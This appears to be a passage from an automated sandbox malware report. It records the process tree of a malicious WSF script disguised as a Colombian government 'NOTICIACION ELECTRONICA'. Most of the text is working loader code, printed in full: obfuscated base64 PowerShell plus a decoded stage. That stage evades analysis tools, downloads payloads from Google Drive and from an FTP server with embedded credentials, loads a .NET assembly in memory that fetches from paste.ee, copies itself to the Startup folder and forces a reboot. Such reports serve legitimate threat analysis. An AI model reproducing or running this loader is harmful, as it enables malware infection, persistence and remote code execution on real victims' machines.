'jAG4ARQAtACAAJwAgACsAIA' + [char]66 + 'sAEcAZg' + [char]66 + 'UAFMAJAAgACsAIAAnACAAaA' + [char]66 + '0AGEAUAAtACAAdA' + [char]66 + 'uAGUAdA' + [char]66 + 'uAG8AQwAtAHQAZQ' + [char]66 + 'HACgAIAA9ACAARw' + [char]66 + 'lAGEAeQ' + [char]66 + 'yACQAIAA7ACAAJwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAnACAAPQAgAE0Abw' + [char]66 + '3AE4AcwAkACcAIAAgAD0AIA' + [char]66 + 'VAHcARA' + [char]66 + 'lAGEAJAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIA' + [char]66 + 'sAEcAZg' + [char]66 + 'UAFMAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAHoASA' + [char]66 + 'sAFQAdQAkADsAIAApACAAQQ' + [char]66 + 'VAHoASA' + [char]66 + 'EACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAE4AbA' + [char]66 + 'yAGgAUAAkACAAPQAgAHoASA' + [char]66 + 'sAFQAdQAkADsAIAApACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC0AIA' + [char]66 + '0AG4AZQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'lAEcAIAAoACAAPQAgACAAQQ' + [char]66 + 'VAHoASA' + [char]66 + 'EACQAOwAgADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4ATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAOwAgAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUwAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AIAA9ACAATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAOwAgACkAJw' + [char]66 + '0AHgAdAAuADIAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAGwARw' + [char]66 + 'mAFQAUwAkADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACcAOA' + [char]66 + 'GAFQAVQAnACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC0AIA' + [char]66 + 'WAHAAaw' + [char]66 + '1AEoAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAHYAWA' + [char]66 + 'VAFYAUgAkADsAIAApACAAeg' + [char]66 + 'uAGMAcQ' + [char]66 + 'uACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + '3ACQAIAA9ACAAdg' + [char]66 + 'YAFUAVg' + [char]66 + 'SACQAOwAgACkAcQ' + [char]66 + 'HAGwAbA' + [char]66 + 'sACQAIAAsAEIAQQ' + [char]66 + 'RAFEATAAkACgAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAQw' + [char]66 + 'rAHIAbw' + [char]66 + '3AHQAZQ' + [char]66 + 'OAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUwAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAC0Adw' + [char]66 + 'lAG4AIAA9ACAAcw' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAC4AdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAHcAJAA7ACAAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAgAD0AIA' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAdwAkADsAIAApACkAIAA0ADYAIAAsADQANgAgACwANAA2ACAALAA0ADYAIAAsADQANgAgACwANAA2ACAALAA2ADUAIAAsADUANQAgACwAMwA1ACAALAA5ADQAIAAsADkAOAAgACwAMAAwADEAIAAsADcAMQAxACAALAA5ADgAIAAsADIAMAAxACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAIAA9ACAAcQ' + [char]66 + 'HAGwAbA' + [char]66 + 'sACQAOwAgACkAKQA5ADQALAA2ADEAMQAsADcAOQAsADQAMQAxACwAOAA5ACwAOAAxADEALAA3ADAAMQAsADkAOQAsADUAMQAxACwAMQAwADEALAAwADAAMQAoAF0AXQ' + [char]66 + 'bAHIAYQ' + [char]66 + 'oAGMAWwAgAG4AaQ' + [char]66 + 'vAGoALQAoACAAPQAgAEIAQQ' + [char]66 + 'RAFEATAAkADsAKQAnAHQAeA' + [char]66 + '0AC4AMQAwAGwAbA' + [char]66 + 'kACcAIAArACAAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgACgAIAA9ACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwARAAvADEAMAAvACcAIAArACAAJw' + [char]66 + 'yAGUAdA' + [char]66 + 'wAHkAcg' + [char]66 + 'jAHAAVQAvAHIAYgAuAG0Abw' + [char]66 + 'jAC4AdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAuAHAAdA' + [char]66 + 'mAEAAMQ' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC8ALwA6AHAAdA' + [char]66 + 'mACcAKAAgAD0AIA' + [char]66 + '6AG4AYw' + [char]66 + 'xAG4AJAA7AH0AIAAKAA0AOw' + [char]66 + '0AGkAeA' + [char]66 + 'lACAAIAAgACAAIAAgAAoADQA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIA' + [char]66 + 'yAGUAdA' + [char]66 + '1AHAAbQ' + [char]66 + 'vAEMALQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'SAAoADQAgAHsAZQ' + [char]66 + 'zAGwAZQAKAA0ACgANAH0ACgANACAAIAAgACAAIAAgACAACgANACAAewApAGwAbA' + [char]66 + '1AE4AJAAgAHEAZQAtACAAKQ' + [char]66 + 'lAHUAbg' + [char]66 + 'pAHQAbg' + [char]66 + 'vAEMAeQ' + [char]66 + 'sAHQAbg' + [char]66 + 'lAGwAaQ' + [char]66 + 'TACAAYQ' + [char]66 + 'lAC0AIAAnAGUAeg' + [char]66 + '5AGwAYQ' + [char]66 + 'uAGEAJwAsACcAUw' + [char]66 + 'OAEQAZQ' + [char]66 + '0AGEAcA' + [char]66 + 'hACcALAAnAGsAcg' + [char]66 + 'hAGgAcw' + [char]66 + 'lAHIAaQ' + [char]66 + 'XACcAIA' + [char]66 + 'zAHMAZQ' + [char]66 + 'jAG8Acg' + [char]66 + 'wAC0AdA' + [char]66 + 'lAGcAKAAoAGYAaQA7ACAAMgAxAHMAbA' + [char]66 + 'UADoAOg' + [char]66 + 'dAGUAcA' + [char]66 + '5AFQAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwAgAH0AZQ' + [char]66 + '1AHIAdAAkAHsAIAA9ACAAaw' + [char]66 + 'jAGEAYg' + [char]66 + 'sAGwAYQ' + [char]66 + 'DAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'kAGkAbA' + [char]66 + 'hAFYAZQ' + [char]66 + '0AGEAYw' + [char]66 + 'pAGYAaQ' + [char]66 + '0AHIAZQ' + [char]66 + 'DAHIAZQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAewAgAGUAcw' + [char]66 + 'sAGUAfQAgAGYALwAgADAAIA' + [char]66 + '0AC8AIA' + [char]66 + 'yAC8AIA' + [char]66 + 'lAHgAZQAuAG4Adw' + [char]66 + 'vAGQAdA' + [char]66 + '1AGgAcwAgADsAJwAwADgAMQAgAHAAZQ' + [char]66 + 'lAGwAcwAnACAAZA' + [char]66 + 'uAGEAbQ' + [char]66 + 'tAG8AYwAtACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACkAIAAnAHAAdQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAG0AYQ' + [char]66 + 'yAGcAbw' + [char]66 + 'yAFAAXA' + [char]66 + '1AG4AZQ' + [char]66 + 'NACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAVw' + [char]66 + 'cAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'NAFwAZw' + [char]66 + 'uAGkAbQ' + [char]66 + 'hAG8AUg' + [char]66 + 'cAGEAdA' + [char]66 + 'hAEQAcA' + [char]66 + 'wAEEAXAAnACAAKwAgAFoAdw' + [char]66 + 'mAHcAVQAkACAAKAAgAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'uAGkAdA' + [char]66 + 'zAGUARAAtACAAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIA' + [char]66 + 'tAGUAdA' + [char]66 + 'JAC0AeQ' + [char]66 + 'wAG8AQwAgADsAIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'yAG8AbgAvACAAdA' + [char]66 + 'lAGkAdQ' + [char]66 + 'xAC8AIA' + [char]66 + 'YAEcAQw' + [char]66 + 'DAEoAIA' + [char]66 + 'lAHgAZQAuAGEAcw' + [char]66 + '1AHcAIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAIAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAKAAgAD0AIA' + [char]66 + 'YAEcAQw' + [char]66 + 'DAEoAOwApACAAZQ' + [char]66 + 'tAGEATg' + [char]66 + 'yAGUAcw' + [char]66 + 'VADoAOg' + [char]66 + 'dAHQAbg' + [char]66 + 'lAG0Abg' + [char]66 + 'vAHIAaQ' + [char]66 + '2AG4ARQ' + [char]66 + 'bACAAKwAgACcAXA' + [char]66 + 'zAHIAZQ' + [char]66 + 'zAFUAXAA6AEMAJwAoACAAPQAgAFoAdw' + [char]66 + 'mAHcAVQAkADsAKQAgACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAKAAgACwAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAKA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHEAdw' + [char]66 + 'qAHYAegAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'xAHcAag' + [char]66 + '2AHoAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'xAHcAag' + [char]66 + '2AHoAJAA7AH0AOwAgACkAJw' + [char]66 + '3ADUAMA' + [char]66 + 'aADEAOA' + [char]66 + '1AGMANw' + [char]66 + 'aAE0ASwA4ADgAZw' + [char]66 + 'lAHQAaA' + [char]66 + 'qAG4AQQ' + [char]66 + 'wAGoAMQ' + [char]66 + 'MAEIALQA0AHkASA' + [char]66 + 'hAGEAMQAnACAAKwAgAHYAZg' + [char]66 + 'xAG0AbgAkACgAIAA9ACAAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAewAgAGUAcw' + [char]66 + 'sAGUAfQA7ACAAKQAnAFYARQ' + [char]66 + 'TAGQAag' + [char]66 + '3AFUAOQA1AFIALQ' + [char]66 + 'XAHMAWQ' + [char]66 + '1AFoATA' + [char]66 + 'pAHcAcg' + [char]66 + 'iADUAWQ' + [char]66 + 'OAFEALQ' + [char]66 + 'IAGoAcg' + [char]66 + 'iADIAcAAxACcAIAArACAAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAKAAgAD0AIA' + [char]66 + '2AGYAcQ' + [char]66 + 'tAG4AJA' + [char]66 + '7ACAAKQAgAGkAZg' + [char]66 + 'tAHUAWAAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcw' + [char]66 + 'uAGkAYQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC4ARQ' + [char]66 + 'SAFUAVA' + [char]66 + 'DAEUAVA' + [char]66 + 'JAEgAQw' + [char]66 + 'SAEEAXw' + [char]66 + 'SAE8AUw' + [char]66 + 'TAEUAQw' + [char]66 + 'PAFIAUAA6AHYAbg' + [char]66 + 'lACQAIAA9ACAAaQ' + [char]66 + 'mAG0AdQ' + [char]66 + 'YACQAOwAnAD0AZA' + [char]66 + 'pACYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'kAD0AdA' + [char]66 + 'yAG8AcA' + [char]66 + '4AGUAPw' + [char]66 + 'jAHUALw' + [char]66 + 'tAG8AYwAuAGUAbA' + [char]66 + 'nAG8Abw' + [char]66 + 'nAC4AZQ' + [char]66 + '2AGkAcg' + [char]66 + 'kAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACAAPQAgAHYAZg' + [char]66 + 'xAG0AbgAkADsAKQAgACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAGoATQ' + [char]66 + 'PAHoASAAkACAAKAAgAGwAZQ' + [char]66 + 'kADsAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'qAE0ATw' + [char]66 + '6AEgAJA' + [char]66 + '7ACAAKQAgAEMAZQ' + [char]66 + 'PAEkAYwAkACAAKAAgAGYAaQA7ACAAKQAyACgAcw' + [char]66 + 'sAGEAdQ' + [char]66 + 'xAEUALg' + [char]66 + 'yAG8Aag' + [char]66 + 'hAE0ALg' + [char]66 + 'uAG8AaQ' + [char]66 + 'zAHIAZQ' + [char]66 + 'WAC4AdA' + [char]66 + 'zAG8AaAAkACAAPQAgAEMAZQ' + [char]66 + 'PAEkAYwAkACAAOwA=';$nymcr = $nymcr.replace('уЦϚ' , 'B') ;;$cpdfb = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nymcr ) ); $cpdfb = $cpdfb[-1..-$cpdfb.Length] -join '';$cpdfb = $cpdfb.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9GP4P3HF\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF');powershell $cpdfb
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:316
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $cIOeC = $host.Version.Major.Equals(2) ;if ( $cIOeC ) {$HzOMj = [System.IO.Path]::GetTempPath();del ( $HzOMj + '\Upwin.msu' );$nmqfv = 'https://drive.google.com/uc?export=download&id=';$Xumfi = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $Xumfi ) {$nmqfv = ($nmqfv + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$nmqfv = ($nmqfv + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$zvjwq = (New-Object Net.WebClient);$zvjwq.Encoding = [System.Text.Encoding]::UTF8;$zvjwq.DownloadFile($nmqfv, ($HzOMj + '\Upwin.msu') );$UwfwZ = ('C:\Users\' + [Environment]::UserName );JCCGX = ($HzOMj + '\Upwin.msu'); powershell.exe wusa.exe JCCGX /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9GP4P3HF\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF' -Destination ( $UwfwZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };$nqcnz = ('ftp://[email protected]/Upcrypter' + '/01/DLL01.txt' );$JukpV = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$LQQAB = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($LQQAB, $lllGq) ;$RVUXv = $webClient.DownloadString( $nqcnz ) ;$RVUXv | Out-File -FilePath $JukpV -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $JukpV ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$aeDwU = '$sNwoM = ''C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9GP4P3HF\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF'' ; $ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$aeDwU += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$aeDwU += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$aeDwU += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$aeDwU += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''0/zpfHt/d/ee.etsap//:sptth'' , $sNwoM , ''DDDMSBuild'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$aeDwU | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"
        5⤵
        Blocklisted process makes network request
        Drops startup file
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2160
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe JCCGX /quiet /norestart
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1220
        
        C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" JCCGX /quiet /norestart
        7⤵
        Drops file in Windows directory
        
        PID:2988
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1164
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7BQ20K5D\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF"
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of WriteProcessMemory
    PID:2776
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $nymcr = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAFUAdw' + [char]66 + 'EAGUAYQAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAHoAVw' + [char]66 + 'XAEIAVgAkADsAJwA7ACkAIAApACAAIAAnACcAZA' + [char]66 + 'sAGkAdQ' + [char]66 + 'CAFMATQ' + [char]66 + 'EAEQARAAnACcAIAAgACwAIA' + [char]66 + 'NAG8Adw' + [char]66 + 'OAHMAJAAgACwAIAAnACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHAAYQ' + [char]66 + 'zAHQAZQAuAGUAZQAvAGQALw' + [char]66 + '0AEgAZg' + [char]66 + 'wAHoALwAwACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAAVQ' + [char]66 + '3AEQAZQ' + [char]66 + 'hACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAAVQ' + [char]66 + '3AEQAZQ' + [char]66 + 'hACQAOwAgACcALgApACAAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAFUAdw' + [char]66 + 'EAGUAYQAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAcw' + [char]66 + 'bACAAPQAgAHoAZA' + [char]66 + 'mAHkARgAkACAAXQ' + [char]66 + 'dAFsAZQ' + [char]66 + '0AHkAQg' + [char]66 + 'bACcAIAA9ACsAIA' + [char]66 + 'VAHcARA' + [char]66 + 'lAGEAJAA7ACAAJwA7ACkAOA' + [char]66 + 'GAFQAVQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAtACAAJwAgACsAIA' + [char]66 + 'sAEcAZg' + [char]66 + 'UAFMAJAAgACsAIAAnACAAaA' + [char]66 + '0AGEAUAAtACAAdA' + [char]66 + 'uAGUAdA' + [char]66 + 'uAG8AQwAtAHQAZQ' + [char]66 + 'HACgAIAA9ACAARw' + [char]66 + 'lAGEAeQ' + [char]66 + 'yACQAIAA7ACAAJwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAnACAAPQAgAE0Abw' + [char]66 + '3AE4AcwAkACcAIAAgAD0AIA' + [char]66 + 'VAHcARA' + [char]66 + 'lAGEAJAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIA' + [char]66 + 'sAEcAZg' + [char]66 + 'UAFMAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAHoASA' + [char]66 + 'sAFQAdQAkADsAIAApACAAQQ' + [char]66 + 'VAHoASA' + [char]66 + 'EACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + 